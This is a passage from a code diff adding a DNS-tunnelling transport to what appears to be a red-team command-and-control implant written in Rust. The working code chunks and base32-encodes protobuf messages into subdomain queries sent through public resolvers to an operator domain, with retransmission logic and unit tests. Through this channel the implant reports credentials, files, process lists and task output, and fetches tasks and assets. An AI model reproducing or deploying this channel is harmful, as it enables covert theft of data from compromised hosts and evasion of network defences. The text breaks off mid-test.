DNS response based on record type, validating transaction ID + fn parse_dns_response(&self, response: &[u8], expected_txid: u16) -> Result> { + if response.len() < 12 { + return Err(anyhow::anyhow!("DNS response too short")); + } + + // Validate transaction ID + let response_txid = u16::from_be_bytes([response[0], response[1]]); + if response_txid != expected_txid { + return Err(anyhow::anyhow!( + "DNS transaction ID mismatch: expected {}, got {}", + expected_txid, + response_txid + )); + } + + // Read answer count from header + let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize; + + // Skip to answer section + let mut offset = 12; + + // Skip question section + while offset < response.len() && response[offset] != 0 { + let len = response[offset] as usize; + offset += len + 1; + } + offset += 5; // Skip null terminator, type, and class + + // Parse all answer records and concatenate data + let mut all_data = Vec::new(); + + for _ in 0..answer_count { + if offset + 10 > response.len() { + return Err(anyhow::anyhow!("Invalid DNS response format")); + } + + // Skip name (2 bytes pointer), type (2), class (2), TTL (4) + offset += 10; + + // Read data length + let data_len = u16::from_be_bytes([response[offset], response[offset + 1]]) as usize; + offset += 2; + + if offset + data_len > response.len() { + return Err(anyhow::anyhow!("Invalid DNS record length")); + } + + // Parse based on record type + match self.record_type { + DnsRecordType::TXT => { + // TXT records have length-prefixed strings + let mut txt_offset = offset; + while txt_offset < offset + data_len { + let str_len = response[txt_offset] as usize; + txt_offset += 1; + if txt_offset + str_len > offset + data_len { + break; + } + all_data.extend_from_slice(&response[txt_offset..txt_offset + str_len]); + txt_offset += str_len; + } + } + DnsRecordType::A | DnsRecordType::AAAA => { + // A records are 4 bytes, AAAA records are 16 bytes - append raw binary + all_data.extend_from_slice(&response[offset..offset + data_len]); + } + } + + offset += data_len; + } + + // For A/AAAA records, data is base32-encoded text that needs decoding + if matches!(self.record_type, DnsRecordType::A | DnsRecordType::AAAA) { + // Trim null bytes from padding in A/AAAA records + while all_data.last() == Some(&0) { + all_data.pop(); + } + + let encoded_str = + String::from_utf8(all_data).context("invalid UTF-8 in A/AAAA response")?; + all_data = base32::decode( + base32::Alphabet::Rfc4648 { padding: false }, + &encoded_str.to_uppercase(), + ) + .ok_or_else(|| anyhow::anyhow!("base32 decode failed")) + .context("failed to decode base32 from A/AAAA records")?; + } + + Ok(all_data) + } + + async fn dns_exchange(&mut self, request: Req, method_code: &str) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + // Marshal request + let request_data = Self::marshal_with_codec::(request)?; + + // Send raw bytes and unmarshal response + let response_data = self.dns_exchange_raw(request_data, method_code).await?; + Self::unmarshal_with_codec::(&response_data) + } + + /// Validate request data and calculate optimal chunking strategy + fn validate_and_prepare_chunks(&self, request_data: &[u8]) -> Result<(usize, usize, u32)> { + // Validate data size + if request_data.len() > MAX_DATA_SIZE { + return Err(anyhow::anyhow!( + "Request data exceeds maximum size: {} bytes > {} bytes", + request_data.len(), + MAX_DATA_SIZE + )); + } + + // Calculate exact chunk_size and total_chunks using varint boundary solving + // Protobuf varints encode differently based on value: + // [1, 127] → 1 byte, [128, 16383] → 2 bytes, [16384, 2097151] → 3 bytes + let (chunk_size, total_chunks) = if request_data.is_empty() { + (self.calculate_max_chunk_size(1), 1) + } else { + let varint_ranges = [(1u32, 127u32), (128u32, 16383u32), (16384u32, 2097151u32)]; + + let mut result = None; + for (min_chunks, max_chunks) in varint_ranges.iter() { + // Calculate overhead assuming worst case (max sequence in this range) + let chunk_size = self.calculate_max_chunk_size(*max_chunks); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + + // Check if the calculated total_chunks falls within this range + if total_chunks >= *min_chunks as usize && total_chunks <= *max_chunks as usize { + // Found the correct range - this is exact + result = Some((chunk_size, total_chunks)); + break; + } + } + + // Fallback for very large data + result.unwrap_or_else(|| { + let chunk_size = self.calculate_max_chunk_size(2097151); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + (chunk_size, total_chunks) + }) + }; + + let data_crc = Self::calculate_crc32(request_data); + + #[cfg(debug_assertions)] + log::debug!( + "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", + request_data.len(), + total_chunks, + chunk_size, + data_crc + ); + + Ok((chunk_size, total_chunks, data_crc)) + } + + /// Send INIT packet to start a new conversation + async fn send_init_packet( + &mut self, + conv_id: &str, + method_code: &str, + total_chunks: usize, + data_size: usize, + data_crc: u32, + ) -> Result<()> { + let init_payload = InitPayload { + method_code: method_code.to_string(), + total_chunks: total_chunks as u32, + data_crc32: data_crc, + file_size: data_size as u32, + }; + let mut init_payload_bytes = Vec::new(); + init_payload.encode(&mut init_payload_bytes)?; + + #[cfg(debug_assertions)] + log::debug!( + "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", + conv_id, method_code, total_chunks, data_size, data_crc + ); + + let init_packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: conv_id.to_string(), + data: init_payload_bytes, + crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + self.send_packet(init_packet) + .await + .context("failed to send INIT packet")?; + + #[cfg(debug_assertions)] + log::debug!("DNS: INIT sent for conv_id={}", conv_id); + + Ok(()) + } + + /// Process a single chunk response and extract ACKs/NACKs + fn process_chunk_response( + response_data: &[u8], + seq_num: u32, + total_chunks: usize, + ) -> Result<(Vec, Vec)> { + let mut acks = Vec::new(); + let mut nacks = Vec::new(); + + if let Ok(status_packet) = DnsPacket::decode(response_data) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs - collect acknowledged sequences + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acks.push(ack_seq); + } + } + + // Process NACKs - collect sequences needing retransmission + for &nack_seq in &status_packet.nacks { + if nack_seq >= 1 && nack_seq <= total_chunks as u32 { + nacks.push(nack_seq); + } + } + } + } else { + #[cfg(debug_assertions)] + log::debug!( + "DNS: Unknown response format ({} bytes), retrying chunk", + response_data.len() + ); + nacks.push(seq_num); + } + + Ok((acks, nacks)) + } + + /// Send data chunks concurrently with windowed transmission + async fn send_data_chunks_concurrent( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + ) -> Result<( + std::collections::HashSet, + std::collections::HashSet, + )> { + use std::collections::HashSet; + + let mut acknowledged = HashSet::new(); + let mut nack_set = HashSet::new(); + let mut send_tasks = Vec::new(); + + for seq in 1..=total_chunks { + let seq_u32 = seq as u32; + + if acknowledged.contains(&seq_u32) { + continue; + } + + let chunk = chunks[seq - 1].clone(); + let conv_id_clone = conv_id.to_string(); + let mut transport_clone = self.clone(); + + // Spawn concurrent task for this packet + let task = tokio::spawn(async move { + let data_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: seq_u32, + conversation_id: conv_id_clone, + data: chunk.clone(), + crc32: Self::calculate_crc32(&chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let result = transport_clone.send_packet(data_packet).await; + (seq_u32, result) + }); + + send_tasks.push(task); + + // Limit concurrent tasks to SEND_WINDOW_SIZE + if send_tasks.len() >= SEND_WINDOW_SIZE { + if let Some(task) = send_tasks.first_mut() { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; + } + send_tasks.remove(0); + } + } + } + + // Wait for all remaining tasks to complete + for task in send_tasks { + if let Ok(task_result) = task.await { + self.handle_chunk_task_result( + task_result, + &mut acknowledged, + &mut nack_set, + total_chunks, + )?; + } + } + + Ok((acknowledged, nack_set)) + } + + /// Handle the result of a chunk transmission task + fn handle_chunk_task_result( + &self, + task_result: (u32, Result>), + acknowledged: &mut std::collections::HashSet, + nack_set: &mut std::collections::HashSet, + total_chunks: usize, + ) -> Result<()> { + match task_result { + (seq_num, Ok(response_data)) => { + let (acks, nacks) = + Self::process_chunk_response(&response_data, seq_num, total_chunks)?; + acknowledged.extend(acks); + nack_set.extend(nacks); + } + (seq_num, Err(e)) => { + let err_msg = e.to_string(); + #[cfg(debug_assertions)] + log::error!("Failed to send chunk {}: {}", seq_num, err_msg); + + // If packet is too long, this is a fatal error + if err_msg.contains("DNS query too long") { + return Err(anyhow::anyhow!( + "Chunk {} is too large to fit in DNS query: {}", + seq_num, + err_msg + )); + } + + // Otherwise, mark for retry + nack_set.insert(seq_num); + } + } + Ok(()) + } + + /// Retry NACKed chunks with retry limit + async fn retry_nacked_chunks( + &mut self, + chunks: &[Vec], + conv_id: &str, + total_chunks: usize, + mut nack_set: std::collections::HashSet, + acknowledged: &mut std::collections::HashSet, + ) -> Result<()> { + use std::collections::HashMap; + + let mut retry_counts: HashMap = HashMap::new(); + + while !nack_set.is_empty() { + let nacks_to_retry: Vec = nack_set.drain().collect(); + + for nack_seq in nacks_to_retry { + // Check retry limit + let retries = retry_counts.entry(nack_seq).or_insert(0); + if *retries >= MAX_RETRIES_PER_CHUNK { + return Err(anyhow::anyhow!( + "Max retries exceeded for chunk {}", + nack_seq + )); + } + *retries += 1; + + // Skip if already acknowledged + if acknowledged.contains(&nack_seq) { + continue; + } + + if let Some(chunk) = chunks.get((nack_seq - 1) as usize) { + let retransmit_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: nack_seq, + conversation_id: conv_id.to_string(), + data: chunk.clone(), + crc32: Self::calculate_crc32(chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + match self.send_packet(retransmit_packet).await { + Ok(response_data) => { + let (acks, nacks) = Self::process_chunk_response( + &response_data, + nack_seq, + total_chunks, + )?; + + // Process ACKs + for ack_seq in acks { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + + // Process NACKs + for new_nack in nacks { + if !acknowledged.contains(&new_nack) { + nack_set.insert(new_nack); + } + } + } + Err(_) => { + // Retry failed - add back to NACK set + nack_set.insert(nack_seq); + } + } + } + } + } + + Ok(()) + } + + /// Fetch response from server, handling potentially chunked responses + async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result> { + #[cfg(debug_assertions)] + log::debug!( + "DNS: All {} chunks acknowledged, sending FETCH", + total_chunks + ); + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (total_chunks + 1) as u32, + conversation_id: conv_id.to_string(), + data: vec![], + crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], + }; + + let end_response = self + .send_packet(fetch_packet) + .await + .context("failed to fetch response from server")?; + + #[cfg(debug_assertions)] + log::debug!( + "DNS: FETCH response received ({} bytes)", + end_response.len() + ); + + // Validate response is not empty + if end_response.is_empty() { + return Err(anyhow::anyhow!("Server returned empty response.")); + } + + // Check if response is chunked + if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { + if metadata.total_chunks > 0 { + return self + .fetch_chunked_response(conv_id, total_chunks, &metadata) + .await; + } + } + + Ok(end_response) + } + + /// Fetch and reassemble a chunked response from server + async fn fetch_chunked_response( + &mut self, + conv_id: &str, + base_sequence: usize, + metadata: &ResponseMetadata, + ) -> Result> { + let total_chunks = metadata.total_chunks as usize; + let expected_crc = metadata.data_crc32; + let mut full_response = Vec::new(); + + for chunk_idx in 1..=total_chunks { + let fetch_payload = FetchPayload { + chunk_index: chunk_idx as u32, + }; + let mut fetch_payload_bytes = Vec::new(); + fetch_payload.encode(&mut fetch_payload_bytes)?; + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (base_sequence as u32 + 2 + chunk_idx as u32), + conversation_id: conv_id.to_string(), + data: fetch_payload_bytes, + crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], + }; + + let chunk_data = self.send_packet(fetch_packet).await?; + full_response.extend_from_slice(&chunk_data); + } + + let actual_crc = Self::calculate_crc32(&full_response); + if actual_crc != expected_crc { + return Err(anyhow::anyhow!( + "Response CRC mismatch: expected {}, got {}", + expected_crc, + actual_crc + )); + } + + Ok(full_response) + } + + async fn dns_exchange_raw( + &mut self, + request_data: Vec, + method_code: &str, + ) -> Result> { + // Validate and prepare chunks + let (chunk_size, total_chunks, data_crc) = + self.validate_and_prepare_chunks(&request_data)?; + + // Generate conversation ID + let conv_id = Self::generate_conv_id(); + + // Send INIT packet + self.send_init_packet( + &conv_id, + method_code, + total_chunks, + request_data.len(), + data_crc, + ) + .await?; + + // Prepare chunks + let chunks: Vec> = request_data + .chunks(chunk_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + // Send all chunks using concurrent windowed transmission + let (mut acknowledged, nack_set) = self + .send_data_chunks_concurrent(&chunks, &conv_id, total_chunks) + .await?; + + // Retry NACKed chunks + self.retry_nacked_chunks(&chunks, &conv_id, total_chunks, nack_set, &mut acknowledged) + .await?; + + // Verify all chunks acknowledged + if acknowledged.len() != total_chunks { + return Err(anyhow::anyhow!( + "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}", + acknowledged.len(), + total_chunks, + (1..=total_chunks as u32) + .filter(|seq| !acknowledged.contains(seq)) + .collect::>() + )); + } + + // Fetch response from server + self.fetch_response(&conv_id, total_chunks).await + } +} + +impl Transport for DNS { + fn init() -> Self { + DNS { + base_domain: String::new(), + dns_servers: Vec::new(), + current_server_index: 0, + record_type: DnsRecordType::TXT, + } + } + + fn new(callback: String, _proxy_uri: Option) -> Result { + // Parse DNS URL formats: + // dns://server:port?domain=dnsc2.realm.pub&type=txt (single server, TXT records) + // dns://*?domain=dnsc2.realm.pub&type=a (use system DNS + fallbacks, A records) + // dns://8.8.8.8:53,1.1.1.1:53?domain=dnsc2.realm.pub&type=aaaa (multiple servers, AAAA records) + let url = if callback.starts_with("dns://") { + callback + } else { + format!("dns://{}", callback) + }; + + let parsed = url::Url::parse(&url)?; + let base_domain = parsed + .query_pairs() + .find(|(k, _)| k == "domain") + .map(|(_, v)| v.to_string()) + .ok_or_else(|| anyhow::anyhow!("domain parameter is required"))? + .to_string(); + + if base_domain.is_empty() { + return Err(anyhow::anyhow!("domain parameter cannot be empty")); + } + + // Parse record type from URL (default: TXT) + let record_type = parsed + .query_pairs() + .find(|(k, _)| k == "type") + .map(|(_, v)| match v.to_lowercase().as_str() { + "a" => DnsRecordType::A, + "aaaa" => DnsRecordType::AAAA, + _ => DnsRecordType::TXT, + }) + .unwrap_or(DnsRecordType::TXT); + + let mut dns_servers = Vec::new(); + + // Check if using wildcard for system DNS + if let Some(host) = parsed.host_str() { + if host == "*" { + // Use system DNS servers + fallbacks + #[cfg(feature = "dns")] + { + use hickory_resolver::system_conf::read_system_conf; + if let Ok((config, _opts)) = read_system_conf() { + for server in config.name_servers() { + dns_servers.push(format!("{}:53", server.socket_addr.ip())); + } + } + } + // Add fallbacks + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } else { + // Parse comma-separated servers or single server + for server_part in host.split(',') { + let server = server_part.trim(); + let port = parsed.port().unwrap_or(53); + dns_servers.push(format!("{}:{}", server, port)); + } + } + } + + // If no servers configured, use fallbacks + if dns_servers.is_empty() { + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } + + Ok(DNS { + base_domain, + dns_servers, + current_server_index: 0, + record_type, + }) + } + + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + self.dns_exchange(request, "/c2.C2/ClaimTasks").await + } + + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + sender: Sender, + ) -> Result<()> { + // Send fetch request and get raw response bytes + let response_bytes = self + .dns_exchange_raw( + Self::marshal_with_codec::(request)?, + "/c2.C2/FetchAsset", + ) + .await?; + + // Parse length-prefixed encrypted chunks and send each one + let mut offset = 0; + while offset < response_bytes.len() { + // Check if we have enough bytes for length prefix + if offset + 4 > response_bytes.len() { + break; + } + + // Read 4-byte length prefix (big-endian) + let chunk_len = u32::from_be_bytes([ + response_bytes[offset], + response_bytes[offset + 1], + response_bytes[offset + 2], + response_bytes[offset + 3], + ]) as usize; + offset += 4; + + // Check if we have the full chunk + if offset + chunk_len > response_bytes.len() { + return Err(anyhow::anyhow!( + "Invalid chunk length: {} bytes at offset {}, total size {}", + chunk_len, + offset - 4, + response_bytes.len() + )); + } + + // Extract and decrypt chunk + let encrypted_chunk = &response_bytes[offset..offset + chunk_len]; + let chunk_response = Self::unmarshal_with_codec::( + encrypted_chunk, + )?; + + // Send chunk through channel + sender + .send(chunk_response) + .map_err(|_| anyhow::anyhow!("receiver dropped")) + .context("failed to send chunk")?; + + offset += chunk_len; + } + + Ok(()) + } + + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + self.dns_exchange(request, "/c2.C2/ReportCredential").await + } + + async fn report_file( + &mut self, + request: Receiver, + ) -> Result { + // Spawn a task to collect chunks from the sync channel receiver + // This is necessary because iterating over the sync receiver would block the async task + let handle = tokio::spawn(async move { + let mut all_chunks = Vec::new(); + + for chunk in request { + let chunk_bytes = + Self::marshal_with_codec::(chunk)?; + // Prefix each chunk with its length (4 bytes, big-endian) + all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); + all_chunks.extend_from_slice(&chunk_bytes); + } + + Ok::, anyhow::Error>(all_chunks) + }); + + // Wait for the spawned task to complete + let all_chunks = handle + .await + .context("failed to join chunk collection task")??; + + if all_chunks.is_empty() { + return Err(anyhow::anyhow!("No file data provided")); + } + + // Send all chunks as a single DNS exchange + let response_bytes = self + .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile") + .await?; + + // Unmarshal response + Self::unmarshal_with_codec::(&response_bytes) + } + + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + self.dns_exchange(request, "/c2.C2/ReportProcessList").await + } + + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + self.dns_exchange(request, "/c2.C2/ReportTaskOutput").await + } + + async fn reverse_shell( + &mut self, + _rx: tokio::sync::mpsc::Receiver, + _tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + Err(anyhow::anyhow!( + "reverse_shell not supported over DNS transport" + )) + } + + fn get_type(&mut self) -> beacon::Transport { + beacon::Transport::Dns + } + + fn is_active(&self) -> bool { + !self.base_domain.is_empty() && !self.dns_servers.is_empty() + } + + fn name(&self) -> &'static str { + "dns" + } + + fn list_available(&self) -> Vec { + vec!["dns".to_string()] + } +} + +#[cfg(test)] +mod tests { + use super::*; + use pb::dns::PacketType; + + // ============================================================ + // CRC32 Tests + // ============================================================ + + #[test] + fn test_crc32_basic() { + let data = b"test data for CRC validation"; + let crc = DNS::calculate_crc32(data); + + // Verify same data produces same CRC + let crc2 = DNS::calculate_crc32(data); + assert_eq!(crc, crc2); + + // Verify different data produces different CRC + let crc3 = DNS::calculate_crc32(b"test datA for CRC validation"); + assert_ne!(crc, crc3); + } + + #[test] + fn test_crc32_known_value() { + // CRC32 IEEE of "123456789" is 0xCBF43926 + let data = b"123456789"; + let crc = DNS::calculate_crc32(data); + assert_eq!(crc, 0xCBF43926); + } + + #[test] + fn test_generate_conv_id_length() { + let conv_id = DNS::generate_conv_id(); + assert_eq!(conv_id.len(), CONV_ID_LENGTH); + } + + #[test] + fn test_generate_conv_id_charset() { + let conv_id = DNS::generate_conv_id(); + for c in conv_id.chars() { + assert!(c.is_ascii_lowercase() || c.is_ascii_digit()); + } + } + + #[test] + fn test_generate_conv_id_uniqueness() { + let id1 = DNS::generate_conv_id(); + let id2 = DNS::generate_conv_id(); + // Statistically, two random 8-char IDs should not be equal + assert_ne!(id1, id2); + } + + #[test] + fn test_encode_data_lowercase() { + let data = b"hello"; + let encoded = DNS::encode_data(data); + + // Should be lowercase + assert_eq!(encoded, encoded.to_lowercase()); + } + + #[test] + fn test_encode_data_valid_chars() { + let data = b"test data with various bytes \x00\xFF"; + let encoded = DNS::encode_data(data); + + // Base32 only uses a-z, 2-7 + for c in encoded.chars() { + assert!( + c.is_ascii_lowercase() || ('2'..='7').contains(&c), + "Invalid char in base32: {}", + c + ); + } + } + + // ============================================================ + // URL Parsing / Transport::new Tests + // ============================================================ + + #[test] + fn test_new_single_server() { + let dns = DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); + + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_multiple_servers() { + // Multiple servers are specified in the host portion, comma-separated + let dns = DNS::new( + "dns://8.8.8.8,1.1.1.1:53?domain=dnsc2.realm.pub".to_string(), + None, + ) + .expect("should parse"); + + assert_eq!(dns.dns_servers.len(), 2); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + assert!(dns.dns_servers.contains(&"1.1.1.1:53".to_string())); + } + + #[test] + fn test_new_record_type_a() { + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), + None, + ) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::A); + } + + #[test] + fn test_new_record_type_aaaa() { + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=aaaa".to_string(), + None, + ) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::AAAA); + } + + #[test] + fn test_new_record_type_txt_default() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_wildcard_uses_fallbacks() { + let dns = + DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + // Should have fallback servers + assert!(!dns.dns_servers.is_empty()); + // Fallback servers include known DNS resolvers + let has_fallback = dns + .dns_servers + .iter() + .any(|s| s.contains("1.1.1.1") || s.contains("8.8.8.8")); + assert!(has_fallback, "Should have fallback DNS servers"); + } + + #[test] + fn test_new_missing_domain() { + let result = DNS::new("dns://8.8.8.8:53".to_string(), None); + assert!(result.is_err()); + assert!(result + .unwrap_err() + .to_string() + .contains("domain parameter is required")); + } + + #[test] + fn test_new_without_scheme() { + let dns = + DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + } + + // ============================================================ + // DNS Packet Building Tests + // ============================================================ + + #[test] + fn test_build_subdomain_simple() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: "test1234".to_string(), + data: vec![0x01, 0x02], + crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should end with base domain + assert!(subdomain.ends_with(".dnsc2.realm.pub")); + + // Should not exceed DNS limits + assert!(subdomain.len() <= MAX_DNS_NAME_LENGTH); + + // Each label should be <= 63 chars + for label in subdomain.split('.') { + assert!( + label.len() <= MAX_LABEL_LENGTH, + "Label too long: {}", + label.len() + ); + } + } + + #[test] + fn test_build_subdomain_label_splitting() { + let dns = DNS { + base_domain: "x.com".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Create a packet with enough data to require label splitting + let packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: 1, + conversation_id: "test1234".to_string(), + data: vec![0xAA; 50], // 50 bytes of data + crc32: DNS::calculate_crc32(&vec![0xAA; 50]), + window_size: 10, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should have multiple labels (dots) + let label_count = subdomain.matches('.').count(); + assert!( + label_count > 1, + "Expected multiple labels, got {}", + label_count + ); + } + + // ============================================================ + // DNS Query Building Tests + // ============================================================ + + #[test] + fn test_build_dns_query_txt() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (query, txid) = dns + .build_dns_query("test.dnsc2.realm.pub") + .expect("should build"); + + // Header should be 12 bytes minimum + assert!(query.len() > 12); + + // Transaction ID should be in first 2 bytes + let query_txid = u16::from_be_bytes([query[0], query[1]]); + assert_eq!(query_txid, txid); + + // Flags should be standard query (0x0100) + assert_eq!(query[2], 0x01); + assert_eq!(query[3], 0x00); + + // Questions count should be 1 + assert_eq!(query[4], 0x00); + assert_eq!(query[5], 0x01); + } + + // ============================================================ + // DNS Response Parsing Tests + // ============================================================ + + #[test] + fn test_parse_dns_response_too_short() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let short_response = vec![0u8; 10]; // Less than 12 bytes + let result = dns.parse_dns_response(&short_response, 0x1234); + assert!(result.is_err()); + } + + #[test] + fn test_parse_dns_response_txid_mismatch() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Response with different transaction ID + let mut response = vec![0u8; 20]; + response[0] = 0x12; + response[1] = 0x34; // txid = 0x1234 + + let result = dns.parse_dns_response(&response, 0x5678); // Expect 0x5678 + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("mismatch")); + } + + // ============================================================ + // Chunk Size Calculation Tests + // ============================================================ + + #[test] + fn test_calculate_max_chunk_size_larger_domain_smaller_chunk() { + let dns_short = DNS { + base_domain: "x.co".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let dns_long = DNS { + base_domain: "very.long.subdomain.dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let chunk_short = dns_short.calculate_max_chunk_size(10); + let chunk_long = dns_long.calculate_max_chunk_size(10); + + // Longer domain leaves less room for data (or same if both exceed available space) + assert!(chunk_short >= chunk_long); + } + + // ============================================================ + // Validate and Prepare Chunks Tests + // ============================================================ + + #[test] + fn test_validate_and_prepare_chunks_empty() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&[]).unwrap(); + + assert!(chunk_size > 0); + assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk + // CRC is deterministic - just verify it's calculated + assert_eq!(crc, DNS::calculate_crc32(&[])); + } + + #[test] + fn test_validate_and_prepare_chunks_small_data() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let data = vec![0xAA; 50]; + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&data).unwrap(); + + assert!(chunk_size > 0); + assert!(total_chunks >= 1); + assert_eq!(crc, DNS::calculate_crc32(&data)); + } + + #[test] + fn test_validate_and_prepare_chunks_exceeds_max() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let huge_data = vec![0xFF; MAX_DATA_SIZE + 1]; + let result = dns.validate_and_prepare_chunks(&huge_data); + + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("exceeds maximum")); + } + + // ============================================================ + // Transport Trait Tests + // ============================================================ + + #[test] + fn test_init_creates_empty_transport() { + let dns = DNS::init(); + assert!(dns.base_domain.is_empty()); + assert!(dns.dns_servers.is_empty()); + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_with_config() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(dns.is_active()); + } + + #[test] + fn test_is_active_empty_domain() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_no_servers() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_name_returns_dns() { + let dns = DNS::init(); + assert_eq!(dns.name(), "dns"); + } + + #[test] + fn test_list_available() { + let dns = DNS::init(); + let available = dns.list_available(); + assert_eq!(available, vec!["dns".to_string()]); + } + + #[test] + fn test_get_type() { + let mut dns = DNS::init(); + assert_eq!(dns.get_type(), beacon::Transport::Dns); + } + + // ============================================================ + // DnsRecordType Tests + // ============================================================ + + #[test] + fn test_dns_record_type_equality() { + assert_eq!(DnsRecordType::TXT, DnsRecordType::TXT); + assert_eq!(DnsRecordType::A, DnsRecordType::A); + assert_eq!(DnsRecordType::AAAA, DnsRecordType::AAAA); + assert_ne!(DnsRecordType::TXT, DnsRecordType::A); + } + + // ============================================================ + // Chunk Response Processing Tests + // ============================================================ + + #[test] + fn test_process_chunk_response_invalid_protobuf() { + let invalid_data = vec![0xFF, 0xFF, 0xFF]; + let result = DNS::process_chunk_response(&invalid_data, 1, 10); + + // Should not error, just mark for retry + assert!(result.is_ok()); + let (_acks, nacks) = result.unwrap(); + assert!(nacks.contains(&1)); + } + + #[test] + fn test_process_chunk_response_valid_status() { + // Create a valid STATUS packet with ACKs + let status_packet = DnsPacket { + r#type: PacketType::Status.into(), + sequence: 0, + conversation_id: "test".to_string(), + data: vec![], + crc32: 0, + window_size: 10, + acks: vec![AckRange { + start_seq: 1, + end_seq: 3, + }], + nacks: vec![5, 6], + }; + + let 